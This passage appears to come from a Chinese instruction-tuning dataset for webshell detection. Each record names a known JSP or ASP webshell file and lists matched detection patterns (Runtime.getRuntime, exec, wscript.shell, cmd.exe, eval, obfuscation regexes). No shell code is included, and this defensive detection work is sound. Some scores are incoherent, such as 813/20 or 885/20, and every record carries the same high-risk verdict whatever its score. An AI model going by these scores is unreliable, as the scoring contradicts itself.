"webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp", "malicious_score": 121, "md5_hash": "dd79ab61ee5ca7bd260dc5b1fdac1948"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"devilzShell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"64630 bytes\", \"行数\": 1319}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 233/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/devilzShell.jsp", "malicious_score": 233, "md5_hash": "816d7a00ae40ae6d84f9223af2c02f17"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"logger小马.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"325 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/logger小马.jsp", "malicious_score": 6, "md5_hash": "edb6b21ae0bab5ea85fcf3987ddb4b1a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"老V.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86723 bytes\", \"行数\": 2326}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/老V.jsp", "malicious_score": 315, "md5_hash": "59317ff94248e0b6df2cbfb5ca8e72b6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"内网扫描header.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"5896 bytes\", \"行数\": 220}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 包含网络功能: HttpURLConnection 恶意度评分: 19/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/内网扫描header.jsp", "malicious_score": 19, "md5_hash": "ed6fc07cc4fbf6c275e26de610c8315d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"by Bagheera.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"32318 bytes\", \"行数\": 807}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 112/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/by Bagheera.jsp", "malicious_score": 112, "md5_hash": "800acc7fbbc6a525b4770895966ccec1"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JFoler 1.0.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"31924 bytes\", \"行数\": 982}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 具备文件操作能力: copy\\s*\\( 恶意度评分: 31/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JFoler 1.0.jsp", "malicious_score": 31, "md5_hash": "4a2508cf8d11603b91e36a509d9e4ceb"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"pwnshell - an interactive jsp shell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"289671 bytes\", \"行数\": 727}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec( 恶意度评分: 90/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/pwnshell - an interactive jsp shell.jsp", "malicious_score": 90, "md5_hash": "5f4a424ced7163b39f7d2e82b22fa347"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"小马.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"2045 bytes\", \"行数\": 47}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/小马.jsp", "malicious_score": 9, "md5_hash": "bcf4edf43743cef19d5bd0a57e826ffd"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"jspspy_k8.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"86757 bytes\", \"行数\": 2324}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 315/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/jspspy_k8.jsp", "malicious_score": 315, "md5_hash": "7e2a13f1fe5a5d5a1f928733c70300c7"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"上传小马.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"700 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/上传小马.jsp", "malicious_score": 9, "md5_hash": "d0e05f9c9b8e0b3fa11f57d9ab800380"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy Codz By - Ninty_1.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"88979 bytes\", \"行数\": 2408}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 316/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspSpy Codz By - Ninty_1.jsp", "malicious_score": 316, "md5_hash": "7ff890676c558fe3e8b148140b247d28"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy Codz By - Ninty.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"87263 bytes\", \"行数\": 2339}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 324/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspSpy Codz By - Ninty.jsp", "malicious_score": 324, "md5_hash": "400fe6f7e38910944cc588583d1fce3b"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspDo Code By Xiao.3.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"1874 bytes\", \"行数\": 47}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspDo Code By Xiao.3.jsp", "malicious_score": 9, "md5_hash": "6e7b0722c130d1c59eb40370841b4fed"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspSpy Private Codz By - Ninty_encode.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"124055 bytes\", \"行数\": 3312}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 465/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspSpy Private Codz By - Ninty_encode.jsp", "malicious_score": 465, "md5_hash": "0bbd815f76eba2af55db8f5c30f684b5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"JspTqz.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"108814 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: response.getWriter, Class.forName, exec(, request.getParameter, Runtime.getRuntime() 发现混淆技术: unpack\\s*\\(, pack\\s*\\( 具备文件操作能力: mkdir\\s*\\(, copy\\s*\\( 恶意度评分: 462/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/JspTqz.jsp", "malicious_score": 462, "md5_hash": "5e3a06a2ecf712ebf06124008ab58497"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Silic Group.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"27766 bytes\", \"行数\": 844}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 37/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/Silic Group.jsp", "malicious_score": 37, "md5_hash": "d8317bf0239a65c4f8055f9e066fdae5"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"SJavaWebManageV1.4.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"54429 bytes\", \"行数\": 1754}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 13/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/SJavaWebManageV1.4.jsp", "malicious_score": 13, "md5_hash": "52349710a68c2058d3ed7a24c452579e"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"XXOO.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8811 bytes\", \"行数\": 165}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName 恶意度评分: 33/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/XXOO.jsp", "malicious_score": 33, "md5_hash": "5bd806c0793538fcedecce01c1c36581"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"hahahaha小马.JSp\", \"文件类型\": \"jsp\", \"文件大小\": \"2195 bytes\", \"行数\": 69}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter 恶意度评分: 12/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/hahahaha小马.JSp", "malicious_score": 12, "md5_hash": "bfd2618ba0bb123622c5b3fd07dcdab6"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cmdjsp.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"725 bytes\", \"行数\": 32}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 9/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/cmdjsp.jsp", "malicious_score": 9, "md5_hash": "b815611cc39f17f05a73444d699341d4"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cat.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"4431 bytes\", \"行数\": 162}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 51/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/园长-jsp/cat.jsp", "malicious_score": 51, "md5_hash": "3e8e2b050a4b2fbf6a8c7454ca2ea380"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"cat.jspx\", \"文件类型\": \"jsp\", \"文件大小\": \"4787 bytes\", \"行数\": 164}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 恶意度评分: 51/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/园长-jsp/cat.jspx", "malicious_score": 51, "md5_hash": "884c93c5662aca9fa38ee226f8e6c45d"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"caidao.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"6278 bytes\", \"行数\": 59}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 23/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/一句话/caidao.jsp", "malicious_score": 23, "md5_hash": "949f088636206d0c11194f4d610aca8a"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"023.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"8377 bytes\", \"行数\": 36}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, Class.forName, exec(, Runtime.getRuntime() 包含网络功能: HttpURLConnection 具备文件操作能力: mkdir\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/图片马/023.jsp", "malicious_score": 26, "md5_hash": "f93461b45d4f21c8fe9ea7632d41e273"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"spjspshell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"19287 bytes\", \"行数\": 814}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: request.getParameter, exec(, Runtime.getRuntime() 具备文件操作能力: copy\\s*\\( 恶意度评分: 34/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/反弹/spjspshell.jsp", "malicious_score": 34, "md5_hash": "7ab8dac087317a99e1be1234bc585ce8"}} {"instruction": "分析这个jsp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"shell.jsp\", \"文件类型\": \"jsp\", \"文件大小\": \"130 bytes\", \"行数\": 1}", "output": "这是一个jsp类型的webshell文件。 检测到恶意函数: exec(, Runtime.getRuntime() 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_jsp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Jsp/反弹/shell.jsp", "malicious_score": 6, "md5_hash": "4eea02c1f584c04596d6fa57bd31e2d0"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"Web Shell.asp\", \"文件类型\": \"asp\", \"文件大小\": \"91690 bytes\", \"行数\": 1266}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, wscript.shell, execute(, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 176/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/Web Shell.asp", "malicious_score": 176, "md5_hash": "13ac4146e4a34e3cb984951ac4ab7701"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp\", \"文件类型\": \"asp\", \"文件大小\": \"46371 bytes\", \"行数\": 792}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, CreateObject(, Createobject(, WSCRIPT.SHELL, Request.Form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 813/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/RHTOOLS 1.5 BETA(PVT) Edited By KingDefacer.asp", "malicious_score": 813, "md5_hash": "f15c903fd0860d8a07a01c82aa4dec03"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"ASPYDrvsInfo.asp\", \"文件类型\": \"asp\", \"文件大小\": \"34432 bytes\", \"行数\": 827}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, request.QueryString, Request.querystring, Request.QueryString, request.querystring 发现混淆技术: chr\\s*\\( 恶意度评分: 440/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/ASPYDrvsInfo.asp", "malicious_score": 440, "md5_hash": "129e59e9c062a27848d10e6d064e272f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"牛逼免杀提权隐藏大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"64943 bytes\", \"行数\": 629}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, execute( 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 195/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/牛逼免杀提权隐藏大马.asp", "malicious_score": 195, "md5_hash": "a604e7475934aecbe3589e1e824e3eff"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"up.asp\", \"文件类型\": \"asp\", \"文件大小\": \"4467 bytes\", \"行数\": 137}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 14/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/up.asp", "malicious_score": 14, "md5_hash": "f775e721cfe85019fe41c34f47c0d67c"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"RedHat Hacker.asp明文版.asp\", \"文件类型\": \"asp\", \"文件大小\": \"94857 bytes\", \"行数\": 2996}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: createobject(, Execute(, request.queryString, execute(, request.Form 发现混淆技术: chr\\s*\\( 恶意度评分: 80/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/RedHat Hacker.asp明文版.asp", "malicious_score": 80, "md5_hash": "bec92b1096273649ef8e936428080824"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp\", \"文件类型\": \"asp\", \"文件大小\": \"89245 bytes\", \"行数\": 1870}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: cREATEObjECt(, wscript.shell, Cmd.exe, eval(, request.form 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 375/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/80sec内部专用过世界杀软休积最小功能超强超猛宇宙第一.asp", "malicious_score": 375, "md5_hash": "3e7589d4ce04b8169107358d97cb3527"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"虚拟机主机提权大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"88563 bytes\", \"行数\": 1295}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: REquEst.form, createobject(, Execute(, wscript.shell, REsPonsE.WritE 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 768/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/虚拟机主机提权大马.asp", "malicious_score": 768, "md5_hash": "259fd18ddcef473bf0a0145279eb468f"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"密码:889.asp\", \"文件类型\": \"asp\", \"文件大小\": \"246780 bytes\", \"行数\": 480}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 恶意度评分: 6/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/密码:889.asp", "malicious_score": 6, "md5_hash": "13dfb4823bc2b08aea50f92cd7c11068"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspSH.v1.asp\", \"文件类型\": \"asp\", \"文件大小\": \"27380 bytes\", \"行数\": 765}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, CMD.EXE, Response.Write, cmd.exe, WScript.Shell 恶意度评分: 24/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/aspSH.v1.asp", "malicious_score": 24, "md5_hash": "d39e8a13a13550704f58756be7e276f1"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"r00ts无FSO组建大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"116827 bytes\", \"行数\": 2294}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, eval(, Request.Form, request.form, response.write 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 885/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/r00ts无FSO组建大马.asp", "malicious_score": 885, "md5_hash": "dda2258df6411e360b67fc920bc763d6"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"mssql.asp\", \"文件类型\": \"asp\", \"文件大小\": \"69282 bytes\", \"行数\": 1666}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: response.Write, Execute(, execute(, Request.QueryString, Response.write 发现混淆技术: chr\\s*\\( 恶意度评分: 551/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/mssql.asp", "malicious_score": 551, "md5_hash": "5e9e87d774194f2e3efaf4b87b07b37e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"法克僵尸大马.asp\", \"文件类型\": \"asp\", \"文件大小\": \"102034 bytes\", \"行数\": 2061}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: wscript.shell, Cmd.exe, eval(, request.form, Request.Form 发现混淆技术: unpack\\s*\\(, pack\\s*\\(, chr\\s*\\( 恶意度评分: 354/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/法克僵尸大马.asp", "malicious_score": 354, "md5_hash": "13f09ca95f4ba29ea97be3b7b853cc8a"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"RHTOOLS 1.5 BETA(PVT).asp\", \"文件类型\": \"asp\", \"文件大小\": \"45569 bytes\", \"行数\": 792}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, CreateObject(, Createobject(, WSCRIPT.SHELL, Request.Form 发现混淆技术: chr\\s*\\( 具备文件操作能力: copy\\s*\\( 恶意度评分: 813/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/RHTOOLS 1.5 BETA(PVT).asp", "malicious_score": 813, "md5_hash": "9681d5a97e7ed48c54aafcabfb3de881"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"aspxshell.aspx\", \"文件类型\": \"asp\", \"文件大小\": \"5110 bytes\", \"行数\": 161}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Request.QueryString, Response.Write, cmd.exe 恶意度评分: 30/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/aspxshell.aspx", "malicious_score": 30, "md5_hash": "8cd33d275d13d00eeaf3a3e88489a8fe"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"AspRootkit 1.0 by BloodSword.asp\", \"文件类型\": \"asp\", \"文件大小\": \"41049 bytes\", \"行数\": 1715}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Execute(, request.queryString, CreateObject(, request.Form, request.form 发现混淆技术: chr\\s*\\( 恶意度评分: 26/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/AspRootkit 1.0 by BloodSword.asp", "malicious_score": 26, "md5_hash": "d10459657a270236a2a8450f1374b69e"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"啊D小工具 - 目录读写检测 [ASP版].asp\", \"文件类型\": \"asp\", \"文件大小\": \"6005 bytes\", \"行数\": 186}", "output": "这是一个asp类型的webshell文件。 检测到恶意函数: Response.Write, CreateObject( 发现混淆技术: chr\\s*\\( 恶意度评分: 101/20 建议: 这是一个高风险的webshell文件,应立即删除并检查系统安全。", "category": "webshell_asp_detection", "source": "webshell_dataset_xl7dev-webshell", "metadata": {"file_path": "xl7dev-webshell/Asp/啊D小工具 - 目录读写检测 [ASP版].asp", "malicious_score": 101, "md5_hash": "b0d0d8b34fba270a5eb274d84e0117d1"}} {"instruction": "分析这个asp文件是否为webshell,并说明判断依据。", "input": "{\"文件名\": \"bypass-iisuser-p.asp\", \"文件类型\": \"asp\", \"文件大小\": \"193 bytes\", \"行数\": 1}", "output": "这是一个asp类型的webshell文件。 